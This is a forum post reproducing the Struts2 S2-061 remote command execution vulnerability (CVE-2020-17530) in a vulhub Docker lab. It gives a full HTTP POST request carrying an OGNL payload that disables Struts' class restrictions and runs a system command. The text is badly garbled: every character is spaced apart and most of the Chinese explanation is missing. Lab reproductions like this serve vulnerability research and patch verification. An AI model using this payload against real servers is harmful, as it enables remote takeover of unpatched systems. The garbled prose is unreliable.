搜索

[727] 2020-12-11_Struts2S2-061远程命令执行漏洞复现(CVE-2020-17530)

文档创建者:s7ckTeam
浏览次数:11
最后更新:2025-01-16
2020-12-11_Struts2S2-061远程命令执行漏洞复现(CVE-2020-17530) S t r u t s 2   S 2 - 0 6 1   C V E - 2 0 2 0 - 1 7 5 3 0     b g b i n g   2 0 2 0 - 1 2 - 1 1 使 v u l h u b h t t p s : / / g i t h u b . c o m / v u l h u b / v u l h u b / t r e e / m a s t e r / s t r u t s 2 / s 2 - 0 6 1 d o c k e r - c o m p o s e . y m l 使 d o c k e r - c o m p o s e   u p   - d 访 i p : 8 0 8 0 S 2 - 0 6 1
使 e x p b u r p p o s t i d S t r u t s   2 S t r u t s 2 M V C W e b s e r v l e t M V C S t r u t s 2 ( C o n t r o l l e r ) S t r u t s   2 S t r u t s   s t r u t s   1 W e b W o r k S t r u t s   2 S t r u t s   2 S t r u t s   1 S t r u t s   2 W e b W o r k 使 S e r v l e t A P I S t r u t s   2 W e b W o r k S t r u t s   1 S t r u t s   2 W e b W o r k S t r u t s   2 P O S T   / i n d e x . a c t i o n   H T T P / 1 . 1 H o s t :   l o c a l h o s t : 8 0 8 0 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t :   * / * A c c e p t - L a n g u a g e :   e n U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 8 0 . 0 . 3 9 8 7 . 1 3 2   S a f a r i / 5 3 7 . 3 6 C o n n e c t i o n :   c l o s e C o n t e n t - T y p e :   m u l t i p a r t / f o r m - d a t a ;   b o u n d a r y = - - - - W e b K i t F o r m B o u n d a r y l 7 d 1 B 1 a G s V 2 w c Z w F C o n t e n t - L e n g t h :   8 2 9 - - - - - - W e b K i t F o r m B o u n d a r y l 7 d 1 B 1 a G s V 2 w c Z w F C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " i d " % { ( # i n s t a n c e m a n a g e r = # a p p l i c a t i o n [ " o r g . a p a c h e . t o m c a t . I n s t a n c e M a n a g e r " ] ) . ( # s t a c k = # a t t r [ " c o m . o p e n s y m p h o n y . x w o r k 2 . u t i l . V a l u e S t a c k . V a l u e S t a c k " ] ) . ( # b e a n = # i n s t a n c e m a n a g e r . n e w I n s t a n c e ( " o r g . a p a c h e . c o m m o n s . c o l l e c t i o n s . B e a n M a p " ) ) . ( # b e a n . s e t B e a n ( # s t a c k ) ) . ( # c o n t e x t = # b e a n . g e t ( " c o n t e x t " ) ) . ( # b e a n . s e t B e a n ( # c o n t e x t ) ) . ( # m a c c = # b e a n . g e t ( " m e m b e r A c c e s s " ) ) . ( # b e a n . s e t B e a n ( # m a c c ) ) . ( # e m p t y s e t = # i n s t a n c e m a n a g e r . n e w I n s t a n c e ( " j a v a . u t i l . H a s h S e t " ) ) . ( # b e a n . p u t ( " e x c l u d e d C l a s s e s " , # e m p t y s e t ) ) . ( # b e a n . p u t ( " e x c l u d e d P a c k a g e N a m e s " , # e m p t y s e t ) ) . ( # a r g l i s t = # i n s t a n c e m a n a g e r . n e w I n s t a n c e ( " j a v a . u t i l . A r r a y L i s t " ) ) . ( # a r g l i s t . a d d ( " i d " ) ) . ( # e x e c u t e = # i n s t a n c e m a n a g e r . n e w I n s t a n c e ( " f r e e m a r k e r . t e m p l a t e . u t i l i t y . E x e c u t e " ) ) . ( # e x e c u t e . e x e c ( # a r g l i s t ) ) } - - - - - - W e b K i t F o r m B o u n d a r y l 7 d 1 B 1 a G s V 2 w c Z w F - -

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理